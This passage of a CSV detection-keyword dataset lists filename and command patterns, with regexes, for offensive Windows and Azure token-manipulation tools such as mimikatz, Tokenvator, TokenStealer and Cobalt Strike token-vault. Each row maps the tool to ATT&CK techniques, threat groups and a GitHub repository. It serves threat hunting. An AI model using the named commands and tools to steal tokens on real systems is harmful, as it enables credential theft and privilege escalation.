- TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61399" "*token::whoami*",".{0,1000}token\:\:whoami.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61400" "*TokenDump.exe*",".{0,1000}TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61401" "*Token-Impersonation -MakeToken -Username *",".{0,1000}Token\-Impersonation\s\-MakeToken\s\-Username\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to 
assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61402" "*Token-Impersonation -MakeToken*",".{0,1000}Token\-Impersonation\s\-MakeToken.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","61403" "*Token-Impersonation -Rev2Self*",".{0,1000}Token\-Impersonation\s\-Rev2Self.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61404" "*Token-Impersonation -Rev2Self*",".{0,1000}Token\-Impersonation\s\-Rev2Self.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","61405" "*Token-Impersonation -Steal*",".{0,1000}Token\-Impersonation\s\-Steal.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - 
T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61406" "*Token-Impersonation -Steal*",".{0,1000}Token\-Impersonation\s\-Steal.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","61407" "*Token-Impersonation.ps1*",".{0,1000}Token\-Impersonation\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61408" "*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","61409" "*TokenKidnapping.cpp*",".{0,1000}TokenKidnapping\.cpp.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","61410" "*TokenKidnapping.exe*",".{0,1000}TokenKidnapping\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get 
SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","61411" "*TokenPlayer-v0.3.exe*",".{0,1000}TokenPlayer\-v0\.3\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61412" "*TokenPlayer-v0.4.exe*",".{0,1000}TokenPlayer\-v0\.4\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61413" "*TokenPlayer-v0.5.exe*",".{0,1000}TokenPlayer\-v0\.5\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61414" "*TokenPlayer-v0.6.exe*",".{0,1000}TokenPlayer\-v0\.6\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61415" "*TokenPlayer-v0.7.exe*",".{0,1000}TokenPlayer\-v0\.7\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - 
T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61416" "*TokenPlayer-v0.8.exe*",".{0,1000}TokenPlayer\-v0\.8\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","61417" "*tokenprivs.cpp*",".{0,1000}tokenprivs\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61418" "*tokenprivs.exe*",".{0,1000}tokenprivs\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","61419" "*Tokens were extracted to tokens.txt! 
Enjoy*",".{0,1000}Tokens\swere\sextracted\sto\stokens\.txt!\sEnjoy.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","#content","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","61420" "*TokenStealer.cpp*",".{0,1000}TokenStealer\.cpp.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61421" "*TokenStealer.exe*",".{0,1000}TokenStealer\.exe.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61422" "*TokenStealer.sln*",".{0,1000}TokenStealer\.sln.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61423" "*TokenStealer.vcxproj*",".{0,1000}TokenStealer\.vcxproj.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61424" "*TokenStealer-master*",".{0,1000}TokenStealer\-master.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential 
Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","61425" "*TokenStealing.cs*",".{0,1000}TokenStealing\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61426" "*TokenStealing.exe*",".{0,1000}TokenStealing\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61427" "*TokenStomp.exe*",".{0,1000}TokenStomp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","61428" "*TokenStripBOF/src*",".{0,1000}TokenStripBOF\/src.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","N/A","10","10","44","7","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z","61429" "*TokenTactics.psd1*",".{0,1000}TokenTactics\.psd1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","61430" "*TokenTactics.psd1*",".{0,1000}TokenTactics\.psd1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","61431" "*TokenTactics.psm1*",".{0,1000}TokenTactics\.psm1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","61432" "*TokenTactics.psm1*",".{0,1000}TokenTactics\.psm1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","61433" 
"*TokenTactics-main.zip*",".{0,1000}TokenTactics\-main\.zip.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","61434" "*TokenUniverse.dproj*",".{0,1000}TokenUniverse\.dproj.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61435" "*TokenUniverse.exe*",".{0,1000}TokenUniverse\.exe.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61436" "*TokenUniverse-master.zip*",".{0,1000}TokenUniverse\-master\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61437" "*TokenUniverse-x64.zip*",".{0,1000}TokenUniverse\-x64\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61438" "*TokenUniverse-x86.zip*",".{0,1000}TokenUniverse\-x86\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","N/A","8","6","597","66","2024-07-20T03:18:21Z","2018-06-22T21:02:16Z","61439" "*Tokenvator*",".{0,1000}Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61440" "*Tokenvator*.exe*",".{0,1000}Tokenvator.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61441" "*Tokenvator.csproj*",".{0,1000}Tokenvator\.csproj.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61442" "*Tokenvator.exe*",".{0,1000}Tokenvator\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61443" "*Tokenvator.git*",".{0,1000}Tokenvator\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61444" "*Tokenvator.pdb*",".{0,1000}Tokenvator\.pdb.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61445" "*Tokenvator.Plugins*",".{0,1000}Tokenvator\.Plugins.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61446" "*Tokenvator.Resources*",".{0,1000}Tokenvator\.Resources.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61447" "*Tokenvator.sln*",".{0,1000}Tokenvator\.sln.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61448" 
"*Tokenvator/MonkeyWorks*",".{0,1000}Tokenvator\/MonkeyWorks.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","61449" "*token-vault steal*",".{0,1000}token\-vault\ssteal.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61450" "*token-vault.cna*",".{0,1000}token\-vault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","61451" "*token-vault.x64.o*",".{0,1000}token\-vault\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY 